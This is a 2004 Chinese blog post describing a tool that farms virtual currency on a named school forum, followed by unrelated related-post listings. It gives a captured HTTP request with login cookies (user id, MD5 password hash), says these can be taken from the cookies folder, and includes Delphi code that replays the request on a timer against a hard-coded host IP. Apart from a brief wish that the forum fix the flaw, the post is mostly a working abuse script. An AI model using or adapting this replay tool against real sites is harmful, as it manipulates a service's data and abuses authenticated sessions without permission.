写了针对学校论坛的刷钱工具

原创 2004年06月26日 19:46:00

我校的建院学子论坛是用的CPB论坛,在每次发贴有个境遇问题,来改变发贴人的钱或魅力,看着很有意思,经过几次发贴,突然发现回贴后出现的页面,通过按F5刷新同样可以经过改变境遇来增加钱数或魅力值,于是明白了白小痴怎么会有这么多钱,不过按F5也太慢了,当然也写一个测试程序了,程序其实很简单,就是一个通过socket向指点的HTTP主机发送数据包
通过IRIS截获 所发送的数据包为

GET /bbs/postfo.asp?t_id=3073&l_id=39&action=do HTTP/1.1
Accept: */*
Referer:
http://stu.sdai.edu.cn/bbs/postfo.asp?t_id=3073&l_id=39&action=do
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: stu.sdai.edu.cn
Connection: Keep-Alive
Cookie: XPlinklinkfylogin=cpb; XPlinklinkfeiyue=userid=XXX&password=XXXXXXXXXXXXXXXX&username=XXXXXXX; ASPSESSIONIDQGQQQLCY=HDIMHDCDMIKGELGOHOJLNPKL


其中通过Cookie 来确定发送者的信息 userid为数据库中的id,password 为密码的 md5 16位加密
这些信息可以从系统的cookies 文件夹中找到
下面写一下主要代码
由于我们只发数据包而不用考虑反回的信息,所以可以用一个timer 控件,来指定间隔时间来发送
构造发送字符串

rl:=chr(13)+chr(10);
  sendstr:='GET /bbs/postfo.asp?t_id=3073&l_id=39&action=do HTTP/1.1'+ rl+
           'Accept: */*'+rl+
           'Referer:
http://stu.sdai.edu.cn/bbs/postfo.asp?t_id=3073&l_id=39&action=do'+rl+
           'Accept-Language: zh-cn'+rl+
           'Accept-Encoding: gzip, deflate'+rl+
           'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)'+rl+
           'Host: stu.sdai.edu.cn'+rl+
           'Connection: Keep-Alive'+rl+
           'Cookie: XPlinklinkfylogin=cpb; XPlinklinkfeiyue=userid='+edit5.Text+'&password='+edit2.Text+'&username='+edit1.Text+'; ASPSESSIONIDQGQQQLCY=HDIMHDCDMIKGELGOHOJLNPKL'+rl+rl+rl;

初始化 tcpclient

 tcpc1.RemoteHost:='202.194.85.2';
  tcpc1.RemotePort:='80';
  tcpc1.Open;
 
在timer 下加代码
 if tcpc1.Connected then
    tcpc1.Disconnect;
  tcpc1.Connect;
  tcpc1.Sendln(sendstr);
  可以根据网速设置 timer 的延时

  这样一个简单的刷钱工具就做好了, 呵呵,希望论坛更正这一漏洞

写了个代码统计工具

周末想统计下XCL-Charts到底写了多少行代码,就用Go语言写了个代码统计工具,效果还不错,统计速度也快。 就把统计报表部份今天完善了下,硬生生把很短的代码澎涨到200多行了。      除了必要...
  • xcltapestry
  • xcltapestry
  • 2014年12月22日 22:52
  • 1603

各种工具类。让程序员快速开发

Android 开发常用工具类 后续将封装更多的工具类,将尝试封装一些跟View相关的工具类,像Adapter....,功能将不断完善,同时感谢每一位开源者的贡献,本工具类参考了很多网上工具类。...
  • u011510913
  • u011510913
  • 2016年09月14日 14:56
  • 581

三国全明星辅助说明

下载完成后,解压打开SanGouRobot.exe 如果打开时出现错误,请先阅读压缩包里面的 "使用阅读.txt"  打开之后如下图,登录你游戏账号的QQ号码   登录...
  • amwih002
  • amwih002
  • 2014年05月27日 13:12
  • 779

为什么在重写了equals()方法之后也必须重写hashCode()方法

我们都知道Java语言是完全面向对象的,在java中,所有的对象都是继承于Object类。Ojbect类中有两个方法equals、hashCode,这两个方法都是用来比较两个对象是否相等的。 在...
  • xad707348125
  • xad707348125
  • 2015年05月10日 22:29
  • 388

突然想写了,于是就写了

呵呵,2013-03-15号的晚上八点,我告诉你,我喜欢你,你低着头笑了,没有说行,也没有说不行,于是,我就牵起你的手,你也没有挣扎,好像在说,其实,我一直在等这一刻,我也笑了,何其幸运,能碰上一个你...
  • dasgk
  • dasgk
  • 2014年03月22日 11:07
  • 672

如何统计自己写了多少代码

心血来潮,学了快一年java了,想看看自己写了多少行代码,基本思路是当初看毕向东视频时,讲过如何遍历文件, 然后自己添加了记录行数的功能,代码早就写好了,就是懒得放到博客上,现在放上来,代码如下: ...
  • yj7758423
  • yj7758423
  • 2016年01月06日 11:03
  • 635

自己用java写了一款日志查找分析工具

工作中需要查日志,在日志中发现grep不能把一个时间戳中的内容都搜索到,因为grep只能按行读文件,于是自己写了一款查日志的工具,可以实现多文本、多正则表达式匹配文本并打印。源代码分享如下: /* ...
  • bestlanzi
  • bestlanzi
  • 2015年12月22日 16:30
  • 1849

写了一个内存地址特征码搜索工具

实现了 1.搜索汇编上的地址 2.搜索匹配特征的内存地址 3.搜索到的地址再做+法计算,还没做读取内存指针,是直接16进制加法 4.支持通配符(就是用正则表达式来做的) 现在还不是很完善,因...
  • flashrhx2010
  • flashrhx2010
  • 2013年04月26日 16:59
  • 625

基本类型和包装类之间的"=="和equals()方法

**public class HelloWorld {/* **1、基本型和基本型封装型进行“==”运算符的比较,基本型封装型将会自动拆箱变为基本型后再进行比较,因此Integer(0)会自动拆箱...
  • lc1978037519
  • lc1978037519
  • 2017年03月30日 11:17
  • 501

即使没人看我们也要坚持写Blog

作为一个程序员即使没人看,没人评论或者评论很不好,甚至有人吐槽,我们也要坚持写博客 ……...
  • cywosp
  • cywosp
  • 2014年04月23日 11:35
  • 11613
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:写了针对学校论坛的刷钱工具
举报原因:
原因补充:

(最多只允许输入30个字)